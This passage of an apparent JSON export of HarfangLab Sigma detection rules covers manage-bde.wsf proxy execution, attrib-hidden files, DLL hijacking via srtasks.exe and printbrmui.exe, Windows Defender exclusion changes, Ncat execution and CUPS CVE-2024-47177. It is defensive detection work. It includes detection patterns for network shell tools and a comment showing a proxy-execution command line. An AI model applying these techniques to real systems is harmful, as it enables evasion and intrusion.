"b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.070621Z", + "creation_date": "2026-03-23T11:45:34.070624Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.070630Z", + "rule_level": "critical", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/", + "https://attack.mitre.org/techniques/T1216/" + ], + "name": "t1216_manage_bde_wsf_execution.yml", + "content": "title: Suspicious Proxy Execution via manage-bde.wsf\nid: 2216764d-df8a-4e07-bb45-54a387f5b02b\ndescription: |\n Detects the malicious execution of the legitimate manage-bde.wsf script to proxy execution of malicious binaries through the hijacking of the manage-bde.exe binary.\n The goal is to plant a manage-bde.exe binary in the current directory to execute it rather than the legitimate binary in System32.\n Attackers may abuse it to bypass security restrictions.\n This script which is used to manage BitLocker and has been deprecated since Windows 7 while manage-bde.exe should be used instead.\n It is recommended to analyze the process responsible for the execution of the manage-bde.wsf script to look for malicious content and other suspicious actions.\nreferences:\n - https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/\n - https://attack.mitre.org/techniques/T1216/\ndate: 2022/01/27\nmodified: 2025/01/09\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1216\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.ManageBDE\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # set comspec=c:\\windows\\system32\\calc.exe & cscript c:\\windows\\system32\\manage-bde.wsf\n selection:\n ParentImage|endswith: '\\cscript.exe'\n 
ParentCommandLine|contains: 'manage-bde.wsf'\n\n exclusion_normal_execution:\n Image: '?:\\Windows\\System32\\cmd.exe'\n CommandLine: '?:\\Windows\\system32\\cmd.exe /c manage-bde.exe -legacy_Vista*'\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\n# level: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2216764d-df8a-4e07-bb45-54a387f5b02b", + "rule_name": "Suspicious Proxy Execution via manage-bde.wsf", + "rule_description": "Detects the malicious execution of the legitimate manage-bde.wsf script to proxy execution of malicious binaries through the hijacking of the manage-bde.exe binary.\nThe goal is to plant a manage-bde.exe binary in the current directory to execute it rather than the legitimate binary in System32.\nAttackers may abuse it to bypass security restrictions.\nThis script which is used to manage BitLocker and has been deprecated since Windows 7 while manage-bde.exe should be used instead.\nIt is recommended to analyze the process responsible for the execution of the manage-bde.wsf script to look for malicious content and other suspicious actions.\n", + "rule_creation_date": "2022-01-27", + "rule_modified_date": "2025-01-09", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1216" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "222c898a-8fe8-430e-9b10-8075c5f1ca5c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "low", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.620258Z", + "creation_date": "2026-03-23T11:45:34.620260Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.620264Z", + "rule_level": "low", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": [ + "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer/", + "https://attack.mitre.org/techniques/T1564/001/" + ], + "name": "t1564_001_file_hidden_through_attrib.yml", + "content": "title: File or Directory Hidden via Attrib.exe\nid: 222c898a-8fe8-430e-9b10-8075c5f1ca5c\ndescription: |\n Detects when files/directories are set as Hidden and System through using attrib.exe.\n This technique can be used by an attacker to hide sensitives directories and/or tools.\n It is recommended to examine the process tree associated with this process to understand the execution context and to determine the legitimacy of this action.\nreferences:\n - https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer/\n - https://attack.mitre.org/techniques/T1564/001/\ndate: 2020/12/04\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image: '*\\attrib.exe'\n CommandLine|contains|all:\n - '+h' # hidden\n - '+s' # system\n\n exclusion_desktop_ini:\n # attrib +s +h C:\\3DEXPERIENCE/desktop.ini\n CommandLine|endswith:\n - '/desktop.ini'\n - '\\desktop.ini'\n\n exclusion_template_gpscript:\n 
ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_samsung_link:\n CommandLine|contains: '?:\\ProgramData\\Samsung\\Samsung Link\\SamsungLink.lock'\n\n exclusion_samsung_link_tray:\n CommandLine|contains: 'AppData\\Roaming\\SAMSUNG\\Samsung Link\\ASPAgent.lock'\n\n exclusion_intel_gfx_cui:\n # Intel Common User Interface GFX execute a bat that hides all cui files in 'C:\\Windows\\System32\\'\n #GrandparentImage: '?:\\Windows\\System32\\igfxCUIService.exe'\n ParentCommandLine: '?:\\Windows\\system32\\cmd.exe /c ?:\\Windows\\system32\\{????????-????-????-????-????????????}.bat'\n CommandLine:\n - 'attrib *+R +H +S +A ?.cui'\n # Workaround for issue 18 (fixed in 2.8.1 and upper)\n - 'attrib +R +H +S +A ?.cui'\n - 'attrib +R +H +S +A ?.cui'\n\n exclusion_razer:\n CommandLine: 'attrib +h +s ?:\\Users\\\\*\\AppData\\Local\\Razer\\RazerAxon\\WallpaperSource\\\\*'\n GrandparentImage: '?:\\Program Files (x86)\\Razer\\Razer Axon\\RazerAxon.exe'\n\n exclusion_syngo:\n CommandLine: '?:\\Windows\\system32\\attrib.exe +s +h \\\\.\\GLOBALROOT\\device\\harddisk0\\partition3\\Recovery\\WindowsRE\\winre.wim'\n ParentCommandLine: 'powershell.exe -ExecutionPolicy Bypass -command try{.\\InstallRAIDdriver.ps1 ?:\\Store\\Log\\Installation\\FieldUpdater\\\\*\\; exit $lastexitcode}catch{echo Exception-message: $_.Exception.Message;exit 1}'\n\n # https://gist.github.com/pknowledge/1feef32fa21475eb9742ea247aefe1af\n exclusion_folder_private:\n CommandLine: 'attrib +h +s Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}'\n ParentCommandLine: '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\\\*.bat'\n\n exclusion_hp:\n CommandLine:\n - 'attrib +r +h +s ?:\\hp'\n - 'attrib +r +h +s ?:\\system.sav'\n ParentCommandLine: '?:\\Windows\\System32\\cmd.exe /c ?:\\system.sav\\logs\\RunFLC.cmd'\n GrandparentImage: '?:\\Windows\\System32\\runonce.exe'\n\n exclusion_blackmagic:\n CommandLine: 'attrib +h +s */auto_Uninstall.qs'\n 
GrandparentImage|endswith: '\\Blackmagic_Fairlight_Sound_Library_Windows.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: moderate\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "222c898a-8fe8-430e-9b10-8075c5f1ca5c", + "rule_name": "File or Directory Hidden via Attrib.exe", + "rule_description": "Detects when files/directories are set as Hidden and System through using attrib.exe.\nThis technique can be used by an attacker to hide sensitives directories and/or tools.\nIt is recommended to examine the process tree associated with this process to understand the execution context and to determine the legitimacy of this action.\n", + "rule_creation_date": "2020-12-04", + "rule_modified_date": "2026-03-16", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1564.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "224d53d5-5b47-46d6-bae7-c97ed2c94fed", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.093020Z", + "creation_date": "2026-03-23T11:45:34.093022Z", + "enabled": 
true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.093027Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_srtasks.yml", + "content": "title: DLL Hijacking via srtasks.exe\nid: 224d53d5-5b47-46d6-bae7-c97ed2c94fed\ndescription: |\n Detects potential Windows DLL Hijacking via srtasks.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'srtasks.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\ktmw32.dll'\n - '\\SPP.dll'\n - '\\SRCLIENT.dll'\n - '\\SRCORE.dll'\n - '\\VSSAPI.DLL'\n - '\\VssTrace.DLL'\n - '\\wer.dll'\n filter_legitimate_image:\n Image|startswith:\n - 
'?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "224d53d5-5b47-46d6-bae7-c97ed2c94fed", + "rule_name": "DLL Hijacking via srtasks.exe", + "rule_description": "Detects potential Windows DLL Hijacking via srtasks.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "22822193-9f29-4f1e-8001-93546cec1e4a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { 
+ "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.610942Z", + "creation_date": "2026-03-23T11:45:34.610945Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.610953Z", + "rule_level": "medium", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": [ + "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", + "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", + "https://attack.mitre.org/techniques/T1562/001/" + ], + "name": "t1562_001_windows_defender_add_exclusion.yml", + "content": "title: Windows Defender Exclusion List Modified\nid: 22822193-9f29-4f1e-8001-93546cec1e4a\ndescription: |\n Detects the modification of Windows Defender's exclusion list.\n Adversaries may modify the exclusion list to avoid possible detection of their tools.\n It is recommended to ensure this new exclusion is legitimate as well as to look for other suspicious actions on the affected host.\nreferences:\n - https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/\n - https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2020/09/25\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n 
TargetObject|startswith:\n # NOTE: Even when using PowerShell (via Add-MpPreference), msmpeng is always the one doing this operation.\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Extensions\\'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Processes\\'\n\n filter_empty:\n Details: '(Empty)'\n\n exclusion_hurukai:\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Processes\\\\?:\\Program Files\\HarfangLab'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Processes\\\\?:\\Program Files\\HarfangLab\\\\*'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\\\?:\\Program Files\\HarfangLab'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\\\?:\\Program Files\\HarfangLab\\\\*'\n Details: 'DWORD (0x00000000)'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "22822193-9f29-4f1e-8001-93546cec1e4a", + "rule_name": "Windows Defender Exclusion List Modified", + "rule_description": "Detects the modification of Windows Defender's exclusion list.\nAdversaries may modify the exclusion list to avoid possible detection of their tools.\nIt is recommended to ensure this new exclusion is legitimate as well as to look for other suspicious actions on the affected host.\n", + "rule_creation_date": "2020-09-25", + "rule_modified_date": "2025-04-14", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1112", + "attack.t1562.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "228c8306-0e42-40a0-89b5-bdbf8a539ddb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.604822Z", + "creation_date": "2026-03-23T11:45:34.604826Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.604833Z", + "rule_level": "medium", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://nmap.org/ncat/", + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md#atomic-test-2---netcat-c2", + "https://attack.mitre.org/techniques/T1049/", + "https://attack.mitre.org/techniques/T1095/" + ], + "name": "t1049_ncat.yml", + "content": "title: Ncat Execution\nid: 228c8306-0e42-40a0-89b5-bdbf8a539ddb\ndescription: |\n Detects the execution of Ncat, a feature-packed networking utility which reads and writes data across networks from command-line.\n Ncat was written for the Nmap Project as a much-improved reimplementation of Netcat.\n Attackers can use ncat to perform malicious activities such as reconnaissance, lateral movement, reverse shell, etc.\n It is recommended to analyze the parent process and context as well as to correlate this alert with other discovery commands executed around it.\nreferences:\n - https://nmap.org/ncat/\n - 
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md#atomic-test-2---netcat-c2\n - https://attack.mitre.org/techniques/T1049/\n - https://attack.mitre.org/techniques/T1095/\ndate: 2022/08/17\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1049\n - attack.command_and_control\n - attack.t1095\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.Ncat\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n # by default Ncat is signed by Insecure.Com LLC\n Imphash: '424b839c413b54caf852f99fc5055a49'\n\n condition: selection\nlevel: medium\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "228c8306-0e42-40a0-89b5-bdbf8a539ddb", + "rule_name": "Ncat Execution", + "rule_description": "Detects the execution of Ncat, a feature-packed networking utility which reads and writes data across networks from command-line.\nNcat was written for the Nmap Project as a much-improved reimplementation of Netcat.\nAttackers can use ncat to perform malicious activities such as reconnaissance, lateral movement, reverse shell, etc.\nIt is recommended to analyze the parent process and context as well as to correlate this alert with other discovery commands executed around it.\n", + "rule_creation_date": "2022-08-17", + "rule_modified_date": "2025-01-31", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.command_and_control", + "attack.discovery" + ], + "rule_technique_tags": [ + "attack.t1049", + "attack.t1095" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "22e5297e-5d7b-4785-82f5-62dea6132903", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": 
"alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.602458Z", + "creation_date": "2026-03-23T11:45:34.602461Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.602469Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_printbrmui.yml", + "content": "title: DLL Hijacking via printbrmui.exe\nid: 22e5297e-5d7b-4785-82f5-62dea6132903\ndescription: |\n Detects potential Windows DLL Hijacking via printbrmui.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - 
https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'printbrmui.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\IPHLPAPI.DLL'\n - '\\PROPSYS.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "22e5297e-5d7b-4785-82f5-62dea6132903", + "rule_name": "DLL Hijacking via printbrmui.exe", + "rule_description": "Detects potential Windows DLL Hijacking via printbrmui.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + 
"attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2307c08f-aa49-4fa1-a3d5-d2a849e2bf17", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.625154Z", + "creation_date": "2026-03-23T11:45:34.625156Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.625160Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/", + "https://gist.github.com/stong/c8847ef27910ae344a7b5408d9840ee1", + "https://www.elastic.co/security-labs/cups-overflow", + "https://attack.mitre.org/techniques/T1203/" + ], + "name": "cve_2024_47177_cupsd_foomatic_rip_shell_execution.yml", + "content": "title: CUPS CVE-2024-47177 Vulnerability Exploited\nid: 2307c08f-aa49-4fa1-a3d5-d2a849e2bf17\ndescription: |\n Detects the suspicious creation of child processes by the foomatic-rip process related to the exploitation of the CUPS (Common UNIX Printing System) vulnerability.\n This detection rule is related to 
multiple vulnerabilities in the CUPS printing system, including CVE-2024-47176, CVE-2024-47076, CVE-2024-47175, and CVE-2024-47177.\n These flaws allow for remote unauthenticated attackers to manipulate IPP URLs or inject malicious data through crafted UDP packets or network spoofing.\n This can result in arbitrary command execution when a print job is initiated.\n It is recommended to investigate the command-line performing this action to determine its legitimacy.\nreferences:\n - https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/\n - https://gist.github.com/stong/c8847ef27910ae344a7b5408d9840ee1\n - https://www.elastic.co/security-labs/cups-overflow\n - https://attack.mitre.org/techniques/T1203/\ndate: 2024/10/02\nmodified: 2025/12/17\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1203\n - cve.2024-47177\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Exploit.CUPS\n - classification.Linux.Exploit.CVE-2024-47177\nlogsource:\n product: linux\n category: process_creation\ndetection:\n selection:\n ProcessParentImage|endswith: '/foomatic-rip'\n sha256|contains: '?' # at least one character, some SHA256 are empty\n\n filter_image:\n ProcessImage:\n - '/usr/bin/foomatic-rip'\n - '/usr/lib/cups/filter/foomatic-rip'\n - '/usr/bin/cat'\n - '/usr/bin/gs'\n\n filter_gs:\n ProcessCommandLine|contains|all:\n - ' -c '\n - ' gs '\n - ' -dBATCH'\n - ' -dNOPAUSE'\n - ' -sDEVICE'\n\n exclusion_plg:\n ProcessCommandLine|contains|all:\n - '@PJL SET COPIES'\n - ' -dPARANOIDSAFER '\n - ' -sDEVICE='\n - ' -sOutputFile='\n\n exclusion_epson:\n ProcessParentCommandLine|contains|all:\n - 'Collate finishings='\n - 'number-up='\n - 'job-uuid='\n - 'job-originating-host-name='\n - 'time-at-creation='\n - 'time-at-processing='\n CommandLine|startswith: 'perl -p -e if (! 
$did) {'\n\n exclusion_printer_payloads:\n ProcessCommandLine|contains:\n # These payloads are from legitimate printer software/tools, primarily used during the pre-printing process.\n - '-c printf \"%%!PS-Adobe-3.0'\n - '/bin/sh -e -c foo2zjs-wrapper '\n - 'ipp://localhost/printers/'\n - '/pdffile (/tmp/foomatic-'\n - '/bin/sh -e -c pdftops '\n - '/var/spool/cups/tmp/foomatic-*'\n - '/bin/sh -e -c foo2xqx-wrapper '\n - '/bin/bash -e -c /bin/cat - | sicgsfilter '\n\n exclusion_cat:\n ProcessCommandLine:\n - '/bin/sh -e -c cat'\n - '/bin/bash -c cat'\n - '/bin/bash -e -c cat'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2307c08f-aa49-4fa1-a3d5-d2a849e2bf17", + "rule_name": "CUPS CVE-2024-47177 Vulnerability Exploited", + "rule_description": "Detects the suspicious creation of child processes by the foomatic-rip process related to the exploitation of the CUPS (Common UNIX Printing System) vulnerability.\nThis detection rule is related to multiple vulnerabilities in the CUPS printing system, including CVE-2024-47176, CVE-2024-47076, CVE-2024-47175, and CVE-2024-47177.\nThese flaws allow for remote unauthenticated attackers to manipulate IPP URLs or inject malicious data through crafted UDP packets or network spoofing.\nThis can result in arbitrary command execution when a print job is initiated.\nIt is recommended to investigate the command-line performing this action to determine its legitimacy.\n", + "rule_creation_date": "2024-10-02", + "rule_modified_date": "2025-12-17", + "rule_os": "linux", + "rule_status": null, + "rule_tactic_tags": [ + "attack.execution" + ], + "rule_technique_tags": [ + "attack.t1203" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2312ad6d-35cc-45d7-83a7-08f4131d32b0", + 
